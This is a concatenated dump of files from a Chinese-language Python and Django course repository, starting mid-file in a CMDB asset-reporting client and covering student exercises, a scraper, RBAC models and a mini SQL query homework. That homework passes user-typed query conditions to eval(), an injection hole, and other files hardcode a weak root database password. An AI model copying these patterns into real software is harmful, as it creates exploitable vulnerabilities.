requests.get(url=self.asset_api) hostname_list = r1.json() pool = ThreadPoolExecutor(20) for hostname in hostname_list: pool.submit(self.task, hostname) def task(self, hostname): info = get_server_info(self, hostname) # 2. 
发送到api r1 = requests.post( url=self.asset_api, data=json.dumps(info).encode('utf-8'), headers={ 'Content-Type': 'application/json' } ) print(r1) <file_sep>/day4/2.今日内容.py # 上午 # 装饰器 # 迭代器和生成器 # 下午 # 内置函数 和 匿名函数 # 递归函数 和 二分查找算法<file_sep>/day2/作业.py ''' 购物车需求: 1 输入正确的用户名和密码,登录成功之后,输入金额,并打印购物车列表 2 用户输入序列号,购买商品,也可以指定购买数量 3 如果你输入的金额大于你要购买的商品,则把商品添加到购物车里,然后扣钱,打印剩余金额 4 如果你输入的金额小于你要购买的商品价格,则提示你余额不足,让你重新输入金额 5 如果不想买了,则输入q退出整个程序 ''' ''' goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] m = input("请输入你的金额:") count = 0 print("id 商品 金额" ) new_list = [] #print (len(goods)) while True: for i in goods: count += 1 if count > 4: count = 1 print(str(count) + "\t" + i.get("name") + "\t" + str(i.get("price"))) shopping_id = input("请输入你想购买的商品id:").strip() if not shopping_id.isdigit() or len(goods) < int(shopping_id): print ("你输入的不符合规范,请重新输入数字:") continue num = input("请输入你想购买的个数") if not num.isdigit(): print ("只能输入数字") buytotal = int(m) * int(i.get('price')) print (buytotal) # for j in goods: # if int(shopping_id) * int(j.get('price')) < int(m): # j.get('name') # j.get('price') # new_list.append(j.get('name')+ j.get("price")+ int(num)) #print (new_list) # 打印商品列表,提示输入 工资 #选择序号,如果选择的是非数字或者大于商品id,则继续输入 #选择购买数量,如果选择的是非数字也提醒继续输入 #如果选择的商品乘以价格和数量大于你的金额,则提醒金额不足,请选择其他商品 #如果购买成功,则吧新买的商品加入到你的列表里面,最后计算价格,退出 ''' goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] money = int(input("请输入你的金额:")) new_list=[] while True: for j in goods: print ("%d %s %d" % (goods.index(j),j["name"],j["price"])) num = input("请选择你想购买的商品:") if not num.isdigit() or len(goods) < int(num): print ("你输入的不是数字,请重新输入") continue if num.isdigit(): num = int(num) jishu = input("请输入你想要购买的数量:") if not jishu:continue if jishu.isdigit(): jishu = int(jishu) if (goods[num]["price"] * jishu) < money: print ("购买成功") count = 1 while count <= jishu: 
new_list.append({"name":goods[num]["name"],"price":goods[num]["price"]}) count += 1 print(new_list) # count = 1 # while count <= jishu: # new_list.append(goods[jishu]["name"]) # count += 1 # print (new_list) # if int(num) * int(jishu) > int(money): # print ("你的余额不足,请购买其他商品") choiceYN = input("如果你还想继续购买请输入y,不想输入n:") if choiceYN == 'Y' or choiceYN == "Y".lower(): continue break <file_sep>/day6/例子.py ''' def person(name,sex,hp,dps): dic = {'name':name,'sex':sex,'hp':hp,'dps':dps,'bag':[]} def attack(dog): dog['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,还剩%s血'%(dic['name'],dog['name'],dog['name'],dic['dps'],dog['hp'])) dic['attack'] =attack # 把attack函数加入到dic里面 #print('dic',dic) return dic def dog(name,kind,hp,dps): dic = {'name':name,'kind':kind,'hp':hp,'dps':dps} def bite(person): person['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,还剩%s血'%(dic['name'],person['name'],person['name'],dic['dps'],person['hp'])) dic['bite'] = bite return dic alex=person('alex','nan',250,5) #alex 接收到了person函数即第一个dic ha2=dog('小黑','藏獒',13000,200) # ha2接收到了dog函数即第二个dic print(alex) #print(ha2) print(alex['attack']) #内部函数 print(alex['attack'](ha2)) # print(ha2) ''' # class Person(): # def __init__(self,name,sex,hp,dps): # self.name=name # self.sex=sex # self.hp = hp # self.dps =dps # alex = Person('alex','男',259,5) # print(alex.__dict__) # print(alex.name) ### # class Person:pass # alex = Person() # # print(alex) # object # print(alex.__dict__) ##默认是空字典 # alex.name = 'alex' # 给alex对象添加属性 # alex.hp = 250 # alex.dps = 5 # alex.sex = '不详' # alex.bag = [] # print(alex.__dict__) # print(Person) #类 # ''' class Person(): def __init__(self,name,hp,dps,sex): self.name=name self.hp=hp self.dps=dps self.sex=sex self.bag=[] def attack(self,dog): dog.hp -=self.dps print('%s打了%s,%s掉了%s点血,还剩%s血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) class Dog(): def __init__(self,name,hp,dps,sex): self.name=name self.hp=hp self.dps=dps self.sex=sex self.bag=[] def attack(self,dog): dog.hp -=self.dps 
print('%s打了%s,%s掉了%s点血,还剩%s血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) alex = Person('alex','男',259,5) ha2=Dog('小黑','藏獒',13000,200) alex.attack() ''' ##园的面积和周长 # from math import pi # class Yuan(): # def __init__(self,r): # self.r=r # def yuan_mianji(self): # return pi * self.r ** 2 # def yuan_zc(self): # return 2*pi*self.r # r=Yuan(3) # print(r.yuan_mianji()) # print(r.yuan_zc()) # class Person(): # COUNTRY = ['中国人'] # def __init__(self,name): # self.name=name # def eat(self): # print('%s在吃泔水'%self.name) # alex=Person('alex') # egon=Person('egon') # print(alex.COUNTRY) #中国人 # alex.COUNTRY=['印度人'] # print(alex.COUNTRY) #印度人 # print(egon.COUNTRY) #中国人 # Person.COUNTRY=['泰国人'] # print(egon.COUNTRY) # print(alex.COUNTRY) class Person: role = 'person' def __init__(self,name): self.name=name def walk(self): print('person is walking') print(Person.role) print(Person.walk) egg=Person('egon') print(egg.name) print(egg.walk()) <file_sep>/day15/python连接mysql/mysql 增删改.py import pymysql # username=input('请输入用户名:') # pwd=input('请输入密码:') #连接数据库 conn = pymysql.connect(host='localhost',user='root',password='123',db='user') #创建游标 cursor=conn.cursor() #增 sql="insert into t1(id,name,pwd) values (%s,%s,%s)" #res=cursor.execute(sql,(2,'hu','123')) res=cursor.executemany(sql,[(3,"root","123456"),(4,"lhf","12356"),(5,"eee","156")]) print(res) #提交 conn.commit() #关闭游标 cursor.close() #关闭连接 conn.close() <file_sep>/day9/进程/进程.py # 什么是进程 : 运行中的程序,计算机中最小的资源分配单位 # 程序开始执行就会产生一个主进程 # python中可以主进程中用代码启动一个进程 —— 子进程 # 同时主进程也被称为父进程 # 父子进程之间的代码执行是异步的,各自执行自己的 # 父子进程之间的数据不可以共享 # 主进程会等待子进程结束之后再结束 #开启一个子进程 import os import time from multiprocessing import Process # def func(num): # print(num,os.getpid()) # time.sleep(0.5) # print(num,os.getpid()) # time.sleep(0.5) # if __name__ == '__main__': # p=Process(target=func,args=(10,)) # p.start() # print(os.getpid()) # time.sleep(1) # print(os.getpid(),1) #父进程和子进程数据不可以共享,打印n为100 # n=100 # def func(): # global n # n=0 # print('------') # time.sleep(3) 
# if __name__ == '__main__': # Process(target=func).start() # time.sleep(1) # print(n) #开启多个子进程 # def func(n): # time.sleep(1) # print('_'*n) # if __name__ == '__main__': # l=[] # for i in range(10): # p=Process(target=func,args=(i,)) # p.start() # l.append(p) # # print('子进程开始了') # for p in l:p.join() # print('10条信息已经发送完毕') #守护进程 # 守护进程也是一个子进程 # 当主进程的代码执行完毕之后自动结束的子进程叫做守护进程 #当主进程结束的时候守护进程才结束 # def deamon_func(): # while True: # print('我还活着') # time.sleep(0.5) # def wahaha(): # for i in range(10): # time.sleep(1) # print(i*'#') # if __name__ == '__main__': # p2=Process(target=wahaha) # p2.start() # p=Process(target=deamon_func) #先执行这个 # p.daemon=True # p.start() # for i in range(3): # print(i*'##') # time.sleep(1) # p2.join() #当主进程代码执行结束之后,守护进程就结束 def deamon_func(): while True: print('我还活着') time.sleep(0.5) def wahaha(): for i in range(10): time.sleep(1) print(i*'#') if __name__ == '__main__': p2=Process(target=wahaha) p2.start() p=Process(target=deamon_func) #先执行这个 p.daemon=True p.start() for i in range(3): print(i*'*') time.sleep(1) # 开启一个子进程 start # 子进程和主进程是异步 # 如果在主进程中要等待子进程结束之后再执行某段代码:join # 如果有多个子进程 不能在start一个进程之后就立刻join,把所有的进程放到列表中,等待所有进程都start之后再逐一join # 守护进程 —— 当主进程的"代码"执行完毕之后自动结束的子进程叫做守护进程 # # def deamon_func(): # while True: # print('我还活着') # time.sleep(0.5) # if __name__ == '__main__': # p=Process(target=deamon_func) # p.daemon=True # p.start() # for i in range(3): # print(i*'#') # time.sleep(1) <file_sep>/day22/new/rbac/admin.py from django.contrib import admin from rbac import models admin.site.register(models.UserInfo) admin.site.register(models.Role) # Register your models here. 
# 自定义一个权限管理类 class PermissionAdmin(admin.ModelAdmin): # 告诉django admin在页面上展示我这张表的那些字段 list_display = ["title","url","is_menu","icon"] # 在列表页面可以编辑url list_editable = ["url","icon","is_menu"] admin.site.register(models.Permission,PermissionAdmin) <file_sep>/day18/练习/orm多对多.py import os if __name__=='__main__': if __name__ == '__main__': os.environ.setdefault("DJANGO_SETTINGS_MODULE", "练习.settings") import django django.setup() from app01 import models # add方法和set方法 ''' author_obj=models.Author.objects.first() ret=author_obj.books.first().title print(ret) author_obj.books.set([2,502,503,501]) # 为作者添加三本书 作者id在前,书名id在后 author_obj.books.add(504) # add在原来的基础上增加 set删除原来的然后在设置新的 ret=author_obj.books.all().values_list("title") print(ret) ''' #查询操作 # 查询第一个作者写过书的名字 #1 基于对象的查询正向查找 ret=models.Author.objects.first().books.all().values("title") print(ret) #基于对象的反向查找 # 默认按照表名_set.all() ret = models.Book.objects.last().authors.all().values("name") print(ret) #基于queryset的双下滑线查询 # ret = models.Author.objects.filter(id=2).values("books__title") #查询id为2作者写的书 # print(ret) # 基于queryset的双下滑线的反向查找,由书找作者(两张写法) res=models.Book.objects.filter(id=504).values_list("authors__name") res1=models.Book.objects.filter(id=504).values("authors__name") # print(res,res1) <file_sep>/day7/student_guanlisystem/bin/start.py import sys import os sys.path.append(os.path.dirname(os.path.dirname(__file__))) from core import core if __name__=='__main__': core.main()<file_sep>/day4/练习题.py # 1.使用lamda表达下面函数。 # def func(x, y): # return x+y # print(func(2,3)) # # ret = lambda x,y:x+y # print(ret(2,3)) 2#为这些基础函数加一个装饰器,执行对应函数内容后, # 将当前时间写入一个文件做一个日志记录。 # import time # def timer(f): # def inner(*args,**kwargs): # local_time = time.time() # # def foo(): # print('hello foo') # return () # # # def bar(): # print('hello bar') #3. 通过内置函数计算5除以2的余数 # #4. 
现有两元祖 (('a'),('b'),('c'),('d') ) ,请使用Python中的匿名函数生成列表 # [ {'a':'c',{'c':'d'}] # ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) ''' #4 按年龄由大到小排列 alist = [{'name':'a','age':20},{'name':'b','age':30},{'name':'c','age':25}] ret = sorted([i.get('age') for i in alist ],reverse=True) print(ret) ''' #6使用内置函数输出 [(1, 'h'), (2, 'e'), (3, 'l')] # l1=[1,2,3,4] # s='hel' # ret = zip(l1,s) # print(list(ret)) #7. 输出钱大于20的人名 结果为['IBM', 'Lenovo', 'oldboy'] shares = { "IBM": 36.6, "Lenovo": 23.2, "oldboy": 21.2, "ocean": 10.2 } # ret = sorted(([i[0] for i in shares.items() if i[1] > 20])) # print(ret) #8. name=['alex','wupeiqi','yuanhao'] #将每个人名后加_sb 结果为['alex_sb','wupeiqi_sb','yuanhao_sb'] # name=['alex','wupeiqi','yuanhao'] # print([i+"_sb" for i in name]) #9. 输出钱最多的人名 结果为alex salaries={ 'egon':3000, 'alex':100000000, 'wupeiqi':10000, 'yuanhao':250 } # ret = sorted([i[0] for i in salaries.items()],reverse=True) # print(ret) # ret1 = sorted(salaries,key=lambda item:item[0]) # print(ret1[0]) print(max(salaries,key=lambda k:salaries[k])) #10,2 print(sorted(salaries,key=lambda k:salaries[k])) <file_sep>/day27/s21crm/crm/middlewares/auth.py import re from django.utils.deprecation import MiddlewareMixin from django.shortcuts import redirect from django.conf import settings class AuthMiddleware(MiddlewareMixin): def process_request(self, request): """ 检查用户登录的中间件 :param request: :return: """ for url in settings.AUTH_VALID_URL: if re.match(url, request.path_info): return None next_url = request.path_info user_info = request.session.get('user_info') if not user_info: return redirect('/login/') <file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/1.错误堆栈信息.py #!/usr/bin/python # -*- coding:utf-8 -*- import traceback def f1(): result = 123 int('asdf') return result def run(): try: ret = f1() print(ret) except Exception as e: msg = traceback.format_exc() print('错误的堆栈信息') run()<file_sep>/day4/优秀的作业/优秀的作业/常莉莉/homework/homework.py #!/usr/bin/env python #coding:utf-8 
#Filename: homework #Author: chang #DATE: 2018-05-05 07:05 import re import os class staff(): def __init__(self): pass def get_staff_info(self,file): if (os.path.exists(file))==False: print("查询的表不存在!") return else: with open (file,encoding="utf-8",mode="r") as f: content_row1=f.readline() title=content_row1.strip().split(",") lenth=len(title) staff_info=[] for i in f: staff_dic={} data = i.strip().split(",") for j in range(lenth): staff_dic.setdefault(title[j], data[j]) staff_info.append(staff_dic) return staff_info def print_info(self,row_name,staff_temp): if row_name == '*': print(staff_temp) else: info = row_name.split(',') res = {} for i in info: #print (i) if i.strip() in staff_temp.keys(): res.setdefault(i.strip(),staff_temp.get(i.strip())) else: print("查询的列不存在") return print(res) def logic_cal(self,staff_temp,logic_exp): logic_exp = re.search('(.+?)([=<>]{1,2}|like)(.+)', ''.join(logic_exp)) # 表达式列表优化成三个元素,形如[‘age','>=',20] 或 [‘dept','like','HR'] if (logic_exp): logic_exp = list(logic_exp.group(1, 2, 3)) if logic_exp[1]=="=": logic_exp[1]="==" if logic_exp[1] == 'like': # 运算符为like的表达式运算 return re.search(logic_exp[2].strip("'").strip('"'), staff_temp.get(logic_exp[0])) and True elif (logic_exp[0].isdigit() and logic_exp[2].isdigit()): # 两头为数字的运算,直接eval函数转数学表达式 return eval(''.join(logic_exp)) elif (logic_exp[1] in ("==",">","<")): # 非数字的运算,即字符串运算,此时逻辑符只可能是‘=',若用eval函数则字符串会转成无定义变量而无法计算,所以拿出来单独用"=="直接计算 eval_list=[staff_temp.get(logic_exp[0]),logic_exp[1],logic_exp[2]] return(eval("".join(eval_list))) # 字符串相等判别,同时消除指令中字符串引号的影响,即输引号会比记录中的字符串多一层引号 else: # 其他不合语法的条件格式输出直接返回False return False else: return False def verify(self,staff_temp, condition): if condition=='': return True condition_list = condition.split() if len(condition_list) == 0: return False logic_str = ['and', 'or', 'not'] # 逻辑运算字符串 且、或、非 logic_exp = [] # 单个条件的逻辑表达式组成的列表,形如[‘age',' ','>','=',20] 或 [‘dept',' ','like',' ','HR'] logic_list = [] # 每个条件的表达式的计算结果再重组后的列表,形如 
[‘True','and','False','or','not','False'] for i in condition_list: if i in logic_str: if (len(logic_exp) != 0): logic_list.append(str(self.logic_cal(staff_temp, logic_exp))) # 逻辑表达式计算并将返回的True或False转化成字符串添加到列表 logic_list.append(i) logic_exp = [] else: logic_exp.append(i) logic_list.append(str(self.logic_cal(staff_temp, logic_exp))) return eval(' '.join(logic_list)) # 列表转化成数学表达式完成所有条件的综合逻辑运算,结果为True或False def select(self,command): command_phrase=re.findall(r"select(.*?)from(.*)",command) #print(command_phrase) if command_phrase: rows_name=command_phrase[0][0].strip() info=command_phrase[0][1].strip() if info.count("where ")>0: m=re.findall(r"(.*?)where(.*)",info) table_name=m[0][0].strip() condition=m[0][1].strip() else: table_name=info condition="" count = 0 staff_list = [] staff_temp=self.get_staff_info(table_name) if staff_temp: for i in staff_temp: if (self.verify(i, condition)): # 验证员工信息是否符合条件 count += 1 staff_list.append(i) print("数据库本次共\033[31;1m查询到%d条\033[0m员工信息,如下:" % count) for staff_temp in staff_list: self.print_info(rows_name,staff_temp) # 查询记录打印 else: print("语法错误") def insert(self,command): pass def update(self,command): pass def delete(self,command): pass def func(self): func_dic={ "select":self.select, "insert":self.insert, "update":self.update, "delete":self.delete, } while (True): command=input("请按照语法输入指令并以分号结束,退出请输入exit:").strip() func=func_dic.get(command.split(" ")[0], "error") if command.lower()=="exit": print("数据库操作结束") break elif func == "error": print("指令不存在,请重新输入!") else: func(command) if __name__=="__main__": sf=staff() #print (sf.get_staff_info("staff")) sf.func() <file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/templatetags/ooxx.py from django.template import Library from django.conf import settings import copy register = Library() # 定义一个函数 # @register.simple_tag() # def show_menu(a): # return '999' @register.inclusion_tag('menu.html') def get_menu(request): new_menu_list = copy.deepcopy(settings.MENU_LIST) flag = False for item 
in new_menu_list: for child in item['children']: if request.path_info == child['url']: child['class'] = 'active' # 子类class item['class'] = '' # 父 类class flag = True break if flag: break return {'menu_list':new_menu_list} <file_sep>/day19/homework/s21/app01/migrations/0005_delete_publisher.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-14 07:46 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('app01', '0004_publisher_user'), ] operations = [ migrations.DeleteModel( name='Publisher', ), ] <file_sep>/test.py # # n=0 # # while n<=100: # # n=n+1 # # num=n%2 # # if num==0: # # print(n) # # # # with open("cy_ip_list",encoding="utf-8",mode='r') as f1, open("error_list",encoding="utf-8",mode='r') as f2: # count = 0 # for i in f2: # i = i.strip() # # print(i) # for ip in f1: # ip=ip.strip() # # print(ip) # # if count == 0: # # print(count) # # # pass # # print(ip.strip()) # # if i in ip: # # print(ip.strip()) # f1.seek(0) # break # count += 1 <file_sep>/day8/ceshi.py # import glance.api.policy as hnf # hnf.get() # # import glance.api.policy # glance.api.policy.get() # # from glance.api import policy # policy.get() #导入一个文件相当于执行了这个文件中的代码 #导入一个包相当于执行这个包中的init文件 #import 后面的这个名字,永远会出现在全局的命名空间里 import glance #绝对导入,其余的在init文件里面实现 #在glace里面的init文件里写的:from glance import api #在api里面的init文件里写的:from glance.api import policy glance.api.policy.get() #相对导入 import glance #在glace里面的init文件里写的:from . 
import api #在api里面的init文件里写的:from .import policy glance.api.policy.get() <file_sep>/deploy/link.py #!/usr/bin/python # -*- coding: UTF-8 -*- import os src = '/home/yx/code' dst = '/home/yx/servie' # 创建软链接 os.symlink(src, dst) print("软链接创建成功") <file_sep>/day8/udp_client.py import socket sk=socket.socket(type=socket.SOCK_DGRAM) while True: inp=input('>>>') if inp=='q':break sk.sendto(inp.encode('utf-8'),('127.0.0.1',8899)) ret=msg,addr=sk.recvfrom(1024) print(msg.decode('utf-8')) if msg.decode('utf-8') =='q':break sk.close()<file_sep>/复习/常用模块.py # orderedict有序字典 import collections # d = collections.OrderedDict() # # d['苹果'] = 10 # d['手机']=5000 # print(d) # for i in d: # print(i,d[i]) # defaultdict 默认字典 # # 例子:小于66的放到k2,大于66的放到k1,形成一个新字典 from collections import defaultdict l= [11, 22, 33, 44, 55, 66, 77, 88, 99, 90] new_dict = defaultdict(list) for value in l: if value > 66: new_dict['k1'].append(value) else: new_dict['k2'].append(value) print(new_dict)<file_sep>/student_guanli_system/db/passwd.py import hashlib # with open('../db/userinfo')as f: # print(f.read()) # username='hnf' # md5obj=hashlib.md5(username.encode('utf-8')) # md5obj.update('123'.encode('utf-8'))# 使用md5算法的对象来操作字符串里面必须是bytes类型 # ret=md5obj.hexdigest() # print(ret) import sys print(sys.modules[__name__])<file_sep>/deploy/deploy/urls.py """deploy URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from web.views import account from web.views import project from web.views import depart from web.views import host from web.views import user from web.views import deploy from web.views import script urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^login/$', account.login, name='login'), url(r'^check/code/$', account.check_code, name='check_code'), # 验证码路径 # 部门url url(r'^depart/list/$', depart.depart_list, name='depart_list'), url(r'^depart/add/$', depart.depart_add, name='depart_add'), url(r'^depart/edit/(\d+)/$', depart.depart_edit, name='depart_edit'), url(r'^depart/del/(\d+)/$', depart.depart_del, name='depart_del'), # host主机 url(r'^host/list/$', host.host_list, name='host_list'), url(r'^host/add/$', host.host_add, name='host_add'), url(r'^host/edit/(\d+)/$', host.host_edit, name='host_edit'), url(r'^host/del/(\d+)/$', host.host_del, name='host_del'), # 用户列表 url(r'^user/list/$', user.user_list, name='user_list'), url(r'^user/add/$', user.user_add, name='user_add'), url(r'^user/edit/(\d+)/$', user.user_edit, name='user_edit'), url(r'^user/del/(\d+)/$', user.user_del, name='user_del'), # 项目 url(r'^project/list/$', project.project_list, name='project_list'), url(r'^project/add/$', project.project_add, name='project_add'), url(r'^project/edit/(\d+)/$', project.project_edit, name='project_edit'), url(r'^project/del/(\d+)/$', project.project_del, name='project_del'), # 发布任务 url(r'^deploy/list/(?P<project_id>\d+)/$', deploy.deploy_list, name='deploy_list'), # 添加发布任务 url(r'^deploy/add/(?P<project_id>\d+)/$', deploy.deploy_add, name='deploy_add'), url(r'^deploy/edit/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_edit, name='deploy_edit'), url(r'^deploy/del/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_del, name='deploy_del'), # url(r'^deploy/rollback/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_rollback, 
name='deploy_rollback'), # 拉代码 url(r'^deploy/fetch/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_fetch, name='deploy_fetch'), # 上传代码 url(r'^deploy/push/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_push, name='deploy_push'), # url(r'^deploy/rollback_list/(?P<project_id>\d+)/$', deploy.deploy_rollback_list, name='deploy_rollback_list'), # 回滚 url(r'^deploy/rollback/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_rollback, name='deploy_rollback'), # script url(r'^script/list/$',script.script_list,name='script_list'), url(r'^script/add/$',script.script_add,name='script_add'), url(r'^script/edit/(\d+)/$',script.script_edit,name='script_edit'), url(r'^script/del/(\d+)/$',script.script_del,name='script_del') ] <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/urls.py from django.conf.urls import url from api import views urlpatterns = [ # url(r'^asset/$',views.asset), url(r'^asset/$',views.AssetView.as_view()), ] <file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/数据.py # permission_menu_list = [ # { # 'permissions__title': '用户列表', # 'permissions__url': '/app01/user/', # 'permissions__name': 'user_list', # 'permissions__menu_id': 1, # 'permissions__menu__title': '用户管理', # 'permissions__menu__icon': 'fa-clipboard', # 'permissions__parent_id': None, # 'permissions__parent__name': None # }, # { # 'permissions__title': '添加用户', # 'permissions__url': '/app01/user/add/', # 'permissions__name': 'user_add', # 'permissions__menu_id': None, # 'permissions__menu__title': None, # 'permissions__menu__icon': None, # 'permissions__parent_id': 1, # 'permissions__parent__name': 'user_list' # }, # { # 'permissions__title': '编辑用户', # 'permissions__url': '/app01/user/edit/(\\d+)', # 'permissions__name': 'user_edit', # 'permissions__menu_id': None, # 'permissions__menu__title': None, # 'permissions__menu__icon': None, # 'permissions__parent_id': 1, # 'permissions__parent__name': 'user_list' # }, # { # 'permissions__title': '订单列表', # 
'permissions__url': '/app01/order/', # 'permissions__name': 'order', # 'permissions__menu_id': 2, # 'permissions__menu__title': '商品管理', # 'permissions__menu__icon': 'fa-clipboard', # 'permissions__parent_id': None, # 'permissions__parent__name': None # } # ] # # for i in permission_menu_list: # print(i.get('permissions__name')) # print(i.get('permissions__url')) ##################################################################### permission_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] menu_list = {} for item in permission_list: id = item['permissions__menu_id'] title = item['permissions__menu__title'] icon = item['permissions__menu__icon'] menu_title = item['permissions__title'] url = item['permissions__url'] menu_list[id] ={ 'title': title, 'icon': icon, 'children': [ {'title': menu_title, 'url': url} ] } print(menu_list) <file_sep>/deploy/web/forms/user.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class UserModelForm(BootStrapModelForm): class Meta: model = models.UserInfo fields = "__all__"<file_sep>/day23/auto - 2 - 固定二级菜单示例/rbac/models.py from django.db import models class User(models.Model): ''' 用户表 ''' name = models.CharField(verbose_name='用户名', max_length=32) password = models.CharField(verbose_name='密码', max_length=64) roles = models.ManyToManyField(verbose_name='关联角色', to="Role", null=True, blank=True) class Role(models.Model): ''' 角色表 ''' role = models.CharField(verbose_name='角色名', 
max_length=32) permissions = models.ManyToManyField(verbose_name='关联权限', to="Permission") class Menu(models.Model): ''' 菜单表 ''' title = models.CharField(verbose_name='菜单名字', max_length=64) icon = models.CharField(verbose_name='图标名称', max_length=128) class Permission(models.Model): ''' 权限表 ''' url = models.CharField(verbose_name='url(含正则)', max_length=128) title = models.CharField(verbose_name='菜单名字', max_length=64) name = models.CharField(verbose_name='url别名', max_length=64, unique=True) menu = models.ForeignKey(verbose_name='关联菜单表', to='Menu', null=True, blank=True) # null数据库可以为空,blank django是空 parent = models.ForeignKey(verbose_name='父菜单', to='Permission', null=True, blank=True) <file_sep>/day25/homework/糗事作业/糗事百科作业.py # 作业要求2.实现糗事百科中文字板块中的所有页面的指定数据(段子内容和作者名称也头像url)爬取 import requests from lxml import etree import os # 获取url url = 'https://www.qiushibaike.com/text/page/%s/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 指定起始也结束页码 page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) # 创建文件夹 if not os.path.exists('qiutu'): os.mkdir('qiutu') # 循环解析且下载指定页码中的图片数据 for page in range(page_start, page_end + 1): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) # response = requests.get(url=new_url, headers=headers,proxies={"https": '192.168.127.12:51505'}) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@id="content-left"]/div') # print(div_list) # 写入到文件 for div in div_list: # 头像 avatars_url = div.xpath('//div[@class="author clearfix"]/a/img/@src') for avatars in avatars_url: avatars_full_url = 'https:' + avatars # 内容 content = div.xpath('.//div[@class="content"]/span//text()')# 获取到多个 content="".join(content) # 转换成字符串 # print(content+'\n') # 作者 author = div.xpath('.//div[@class="author 
clearfix"]//h2//text()')[0] # print(author) with open('xiaohua.txt', 'a', encoding='utf-8') as f: f.write(avatars_full_url + "\n" + author + ':' + content + "\n\n") <file_sep>/day2/04_dic.py dic = {'name': 'taibai', 'age': 21, 'hobby': 'girl', } # # #增加 # # dic ['high'] = 180 ##有则覆盖,无则添加 # print (dic) # dic ['name'] = 'ritian' # print (dic) # # dic.setdefault('high',170) ##有则不变,无责添加 # print (dic) # dic.setdefault('sex','nan') # print (dic) # # #删除 # print (dic.pop('name')) # print (dic.pop('name1','没有辞职,sb')) # # # dic.clear() #清空 # # print (dic) # # print (dic.popitem()) #随机删除,返回值 # #改 # dic['name'] = 'laonanhai' # print (dic) # # dic2 = {'name':'alex','weight':75} # dic2.update(dic) # print (dic) # print (dic2) #查 # print (dic['name']) # print (dic.get('name')) # print (dic.get('name1','没有此键值')) # #keys() values() items() # print (list(dic.keys())) ##可以取出键值,变成列表 # for i in dic.keys(): ##可以循环打印键值 # print (i) # # # print (list(dic.values())) ##只能取出values # for i in dic.values(): # print (i) # # print (list(dic.items())) ##可以同时取出键值和values # for i in dic.items(): # print (i) ##其他类型 #分别赋值 a,b = 1,2 print (a,b) a = 1 b = 5 print (a,b) for k,v in dic.items(): print (k,v) #len 长度 print (len(dic)) ##fromkeys 创建一个新字典 dic1 = dict.fromkeys('abc', '张三') print (dic1) #打印结果 {'a': '张三', 'b': '张三', 'c': '张三'} dic3 = dict.fromkeys('abc',[10]) print (dic3) dic3['a'].append('oldboy') print (dic3) #打印结果 {'a': ['oldboy'], 'b': ['oldboy'], 'c': ['oldboy']} # dic = { # 'name_list':['b哥', '张帝', '人帅', 'kitty'], # '老男孩':{ # 'name':'老男孩', # 'age': 46, # 'sex': 'ladyboy', # }, # } # # a = (dic['name_list']) # b=(dic['name_list']).append('骑兵') <file_sep>/day4/优秀的作业/优秀的作业/常莉莉/homework/readme.txt 博客地址:http://www.cnblogs.com/yimiaoyikan/ 作业整体思路: 1)用正则表达式,实现对select 的拆分,拆分出表名字\查询的列\查询条件 2)先读取文件内容,返回一个列表,元素为字典 3)对where条件中的逻辑进行判断,符合条件的返回true,不符合条件返回false 4)对查询的列进行判断,如果查询的列在字典的键中,则打印对应的键值;如果是*,则打印所有的列 作业运行方式: 右键,run.输入select 语句 实现的功能:支持一下几种语法: 1)select * from staff 2)select id,name from staff where 
